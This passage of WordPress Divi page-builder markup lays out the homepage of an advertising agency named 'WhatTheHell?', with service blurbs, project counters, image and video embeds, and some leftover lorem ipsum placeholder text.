_builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Why We\" title_text=\"Why-we\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" hover_enabled=\"0\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\" custom_margin=\"-86px|||||\"]<h2><span>Why choose us?</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"||31px|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p><span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>\n[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" 